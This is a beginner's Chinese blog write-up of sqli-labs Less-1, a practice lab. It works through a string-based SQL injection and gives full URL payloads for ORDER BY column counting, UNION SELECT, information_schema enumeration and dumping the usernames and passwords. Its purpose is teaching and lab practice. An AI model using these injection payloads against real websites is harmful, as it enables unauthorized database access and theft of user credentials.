sqlilabs-Less-1

最新推荐文章于 2024-05-02 16:43:37 发布
原创 最新推荐文章于 2024-05-02 16:43:37 发布 · 228 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#sql #网络安全 #数据库

文章详细介绍了SQL注入的基本过程,从探测数据类型到利用union查询获取数据库信息,包括表名、字段名及内容。通过示例展示了如何利用?id=1and1=1--注释技巧,以及如何利用information_schema获取数据库元数据。

        初学者,记录自己做题学习的过程,大部分是看着别人的教程在做。

第一关打开后如下图:

可以看到提示让我们输入参数id,并且提示是数字,这里先尝试输入

/?id=1和/?id=2和/?id=666(随便输入)

可以看到输入1,2的时候有回显,输入666的时候没有回显,说明数据库中有id=1和2的数据。

下面尝试判断注点是字符型还是数字型,输入

/?id=1 and 1=1

/?id=1 and 1=2

可以看出是正常返回结果,这时查看源码看看

在sql语句拼接时,用的是id=‘$id’,说明id是字符型字段,也就是说当我们输入参数id=1 and 1=1时,拼接的sql语句是

select * from users where id = '1 and 1=1' limit 0,1;

因此这时应该在id输入值后加一个引号,将前面的引号抵消掉才能注入我要注入的sql语句,比如这时输入/?id=1'

可以看到这时回显错误,数据库报错显示语法错误,原因是拼接的SQL语句最后有一个limit 0,1,limit是分页查询,limit 0,1的意思是显示第一页的一条数据,而且前面还有一个代码中自带的引号没有注释掉,所以会显示语法错误,这时使用--+或者--%20来注释掉后面的引号和limit

输入/?id=1' and 1=1 --+或者/?id=1' and 1=1 --%20

 

 

这里--是起着注释的作用,+代表是空格,因为--注释后单独接一个空格在传输的过程中会被忽略(在哪一步会被忽略我也不知道),同样空格的url编码是%20,所以--%20也可以注释。

确定完注入类型为字符型,并且注释掉后面语句后就可以开始注入了。

第一步先要确定表中的字段数,使用order by 1,然后递增

/?id=1' and 1=1  order by 1--+

当order by 4的时候出现的错误显示没有第四个字段,说明表中有三个字段,接着就可以开始第二步

第二步使用的是union联合注入,union联合注入的要求是多条查询语句的字段数要相等,所以需要先确定表中的字段数,因为前面的查询语句是select *,查询全部,所以后面union 的select语句也要和前面字段数相等。

构造/?id=1' union select 1,2,3 --+

这一步我们的目标是要测试3个字段中哪些是回显位,但是输入上面内容后并没有输入想要的内容,这是因为union联合了两个查询,但是输出只会按顺序输出,也就是说我们输入的union后的select没有输出。另外在这里说一下回显位的意思,首先我们知道表中一共三个字段,但是网页中只会输出两个字段的内容,这时就要判断三个字段中的哪两个字段被输出了,而select 1,2,3的意思是如果不指定字段名只是输入数字,那么返回查询的结果就是数字本身,这里我在数据库中演示一下。

可以看到,test1表中共三个字段,union后的select 1,2,3直接输出了1,2,3,这样就很直观了。

接着继续说怎样解决回显位没显示的问题。只要让前面的select查询不出来内容,就会自动显示union 后的select的内容了。

构造/?id=666' union select 1,2,3-- +

可以看到回显位是2,3位,也就是说name是在第2个字段,password是在第3个字段。这时我们就可以在2,3位置上输入查询的语句来返回需要的内容,比如查询当前数据库名database()和查询数据库版本version()

构造/?id=666' union select 1,database(),version()--+可以看到数据库名security,版本5,7,26

接着知道了数据库名后我们就要开始获取表名和字段名,这里要知道的知识点是在mysql5.0以上的版本中都会自带四个数据库,分别是information_schema,mysql,performance_schema和test,这里我们要了解的是information_schema,这个库中包含了所有数据库的信息,包括每个数据库的名字,表名,字段名、字段类型等。另外还需要知道一些里面的参数名

information_schema.tables:包含了数据库里所有的表。

table_schema:数据库名

table_name:表名

column_name:字段名

接下来第三步开始获取这些信息

构造/?id=666' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security'--+

union后的select的语句意思是从 information_schema.tables数据库中查询security数据库中的所有表名。可以看到一共有四个表,其中的users是我们要用的表。

group_concat()是mysql中的一个函数,主要作用就是输出一个字符串,并用逗号隔开。

接着第四步开始获取users中的字段名

/?id=666' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users' and table_schema='security'--+

 这里select语句的意思是从information_schema.columns中查询security数据库中users表中的字段名。可以看到一共有三个字段id,username,password,明显我们需要的是username和password两个字段的内容。

接下来最后一步获取这两个字段的内容。

/?id=666' union select 1,group_concat(username),group_concat(password) from users--+

可以看出将表中的内容都显示出来了。

到这里就结束了,感谢这个作者,我基本上是按照他的思路操作的。

sqlilabs第一关懵逼小解答_热爱画家夫人的博客-优快云博客

这才第一关,安全之路漫漫,加油!

 

 

 

 

 

 

 

网络安全自学教程》- SQL注入之报错注入原理+步骤+实战操作
wangyuxiang946的博客
03-07 1万+
这篇文章为大家解析报错注入的实现原理,结合实战案例讲解报错注入的使用步骤。
Sqli-labs靶场详细攻略Less 1-5
qq_41755084的博客
10-09 1721
Sqli-labs靶场详细攻略
sqli-labs less-1
zbbjya的博客
02-08 562
请输入id作为带数值的参数 ==================================================----------======= 输入 ?id=1 我们会看到这个sql语句是我们添加进去的,原本是应该没有的 limit 0.1;其中第一位是从第几个开始的,比如0代表从第一个开始,而第二位的1代表的就是显示多少个数据 再输入加一个单引号我们会发现报错了 ​ ?id=1' 一个一个的试 127.0.0...
Sqli-labs Less-1
Jiajiajiang_的博客
11-02 396
基于错误的SQL注入 Less-1 Less-1 基于错误的单引号注入 1、测试漏洞是否存在 1)id=1时,正常执行 http://127.0.0.1/sqlilabs/Less-1/?id=1 2)id=1'时,报错,说明可能存在SQL注入 http://127.0.0.1/sqlilabs/Less-1/?id=1' 从上述错误当中,我们可以看到提交到SQL语句...
Sqli-labs之Less-1
→_→
03-11 1161
我们先来看看这个环境有哪些题: 接下来开始我们的学习之旅吧! Less-1 翻译:GET-基于错误-单引号-字符串 欢迎 Dh...
Sqli-Labs之less-1
ISNS的博客
02-03 1906
说在开头:文章是我通过查询资料后按照自己的理解总结出来的,所以如果有说法不对的地方,欢迎大佬指正~ 1.进入less-1的题目以后,我们可以看到这道题的提示“请输入ID作为带数值的参数”: 2.我们根据题目提示,尝试在URL中加上“?id=1”、“?id=2”,可以看到看到从数据库中查询到的用于登录login的用户名和密码: 我们要找的是网站后台管理员的用户名和密码,目的是拿到网站的权限,从...
SQL注入之sqli-labs(less1-7)
冷冷的oO
04-24 4139
注:靶场基本上每一关的目标都是拿到数据库的用户名和密码。 Less-1 打开第一关看到如下页面,“Dhakkan”是印度俚语,意思是愚蠢的人,页面提示让我们输入ID值作为参数。
Sqli-labs靶场第11关详解[Sqli-labs-less-11]
m0_73615178的博客
02-24 2023
SQL注入的三个条件:①参数可控;(从参数输入就知道参数可控)②参数过滤不彻底导致恶意代码被执行;(需要在测试过程中判断)③参数带入数据库执行。(从网页功能能大致分析出是否与数据库进行交互)利用 order by 来测列数测显位:mysql1,2,3,4Mysql获取相关数据:一、数据库版本-看是否认符合information_schema查询-version()二、数据库用户-看是否符合root型注入攻击-user()三、当前操作系统-看是否支持大小写或文件路径选择-
Sqli-labs靶场第9关详解[Sqli-labs-less-9]
m0_73615178的博客
02-24 2560
利用 order by 来测列数测显位:mysql1,2,3,4Mysql获取相关数据:一、数据库版本-看是否认符合information_schema查询-version()二、数据库用户-看是否符合root型注入攻击-user()三、当前操作系统-看是否支持大小写或文件路径选择-@@version_compile_os四、数据库名字-为后期猜解指定数据库下的表,列做准备-database()SQL注入-时间型盲注(Time-based blind)
网络安全-sqlmap实战之sqlilabs-Less8_sqli-labs-master less-8 select from users where
2401_84254087的博客
05-02 256
当我学到一定基础,有自己的理解能力的时候,会去阅读一些前辈整理的书籍或者手写的笔记资料,这些笔记详细记载了他们对一些技术点的理解,这些理解是比较独到,可以学到不一样的思路。网安所有方向的技术点做的整理,形成各个领域的知识点汇总,它的用处就在于,你可以按照上面的知识点去找对应的学习资源,保证自己学得较为全面。观看零基础学习视频,看视频学习是最快捷也是最有效果的方式,跟着视频中老师的思路,从基础到深入,还是很容易入门的。添加–dbms参数,–technique参数。使用-o参数优化,–batch参数进行跳过。
网络安全-sqlmap实战之sqlilabs-Less11_less11sql注入用sqlmap将数据库dump
2401_84248681的博客
04-29 393
错误回显sql语句猜测。
Sqli-labs靶场第12关详解[Sqli-labs-less-12]
m0_73615178的博客
03-02 1214
所以,payload分析输入一个username值然后使用单引号加小括号 ") 闭合前面的语句,然后为了使where语句条件成立,加上一个or 1=1-- 注释语句使后面的语句直接注释password不用判断。由于这题是post请求,所以先使用burp进行抓包,然后将数据包存入txt文件中打包 用-r 选择目标txt文件。根据题目看,像一个登录页面,尝试使用布尔型盲注测试能否登录网站。输入:-admin") union select 1,2--爆出当前数据库名称及当前用户名。
sqli-libs-less1
01mx的博客
03-18 224
sqli1
Sqli-labs靶场笔记1Less-1 SQL注入基本操作)
m0_52233414的博客
03-31 622
sqli-labs靶场使用的是mysql数据库,所以在打之前,我们要了解一下mysql数据库的结构,mysql数据库5.0以上版本有一个自带的数据库叫做information_schema,该数据库下面有两个表一个是tables和columns。tables这个表的table_name字段下面是所有数据库存在的表名。table_schema字段下是所有表名对应的数据库名。columns这个表的colum_name字段下是所有数据库存在的字段名。columns_schema字段下是所有表名对应的数据库
sqli-labs-less-1完整解析,小白干货
yzcn
10-22 2279
Less-1 Sql知识点: Limit(x,y):从x+1行开始输出,共输出y行 Order by:排序,asc升序(默认),desc(降序) Union:MySQL执行两条SELECT语句,并把输出组合成单个查询结果集 Group_concat:连接作用,group_concat( 要连接的字段 ) [Order BY 排序字段 ASC/DESC] [Separator ‘分隔符’] concat_ws:concat_ws(‘-’,a,b) 将a和b用-连接起来 MySQL中默认建立的数据库
Sqli-labs之Less1-10
Mi1k7ea
04-14 4761
为了更好地学习SQL注入,便从sqli-labs开始入手吧。很多东西都是不懂,所以也是从各位前辈、大牛的博客以及书籍中去学习,将自己学到的都记录一下,以便以后的查看。同时也希望各位能够多多给点指导,让本人能够更好地掌握各种方法技巧等等。 为了更方便地实现操作,直接用Firefox的HackBar插件来操作~ Less1--基于错误的单引号字符型注入 直接在url中输入?id=1可以看
通过sqli-labs学习sql注入——基础挑战之less1-10
热门推荐
giantbranch的专栏
05-02 5万+
欢迎光顾我的新博客:https://www.giantbranch.cn 本文链接:http://blog.youkuaiyun.com/u012763794/article/details/51207833 虽然sql注入接触过不少,其实也不太多,但是不系统,那就通过sqli-libs系统学习总结一下吧 注:第一个就说得详细一点,后面的有新知识才会说,所以第一个一定要看!!!如果第一个还有不明白的地方...
sqli-labs—————Less-1(字符型注入)
Fly_鹏程万里
05-08 2155
前言从这一篇文章开始,我们将开始真正的讲解Sqli-libs中的各种注入,从第1阶层开始,后续的内容会陆续放出,欢迎各位大佬的关注与评论!Less-1首先,打开主页进入第一关:可以看到提示,提示我们要传入一个参数,名为ID,而且是数据类型,那么我就传入该参数看看到这里,我们可以发现后台执行的SQL语句好像是根据该传入的参数id进行了相应的查询,那么我可以从搭建的环境中来看看它的数据库到底有什么东西...
sqli-labs-master Less-1
Risker
04-10 1169
提示提交id值,用单引号试一下,报错:猜测id值在查询语句中被单引号包裹。接下来用order by测字段数 测出3个字段。然后看当前的数据库,构造payload:http://127.0.0.1/sqli-labs-master/Less-1/?id=1'  union select 1,1,database() %23给我返回了这个id=1的值:要执行union后的语句就要让union前的查询语...
sqli-labs-less1
最新发布
05-26
sqli-labs-less1是一个SQL注入练习平台,它主要用于学习和测试SQL注入攻击技术。sqli-labs-less1是一个非常基础的例子,旨在演示如何使用SQL注入攻击来绕过登录认证。它提供了一个登录页面,其中包含用户名和密码字段。攻击者可以通过在输入框中输入特定的字符串来尝试绕过认证。 如果您想深入学习SQL注入攻击技术,sqli-labs-less1可能是一个很好的练习平台。但请注意,这个平台是为了学术目的而设计的,不要在未授权的情况下尝试对任何真实的系统进行SQL注入攻击。
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值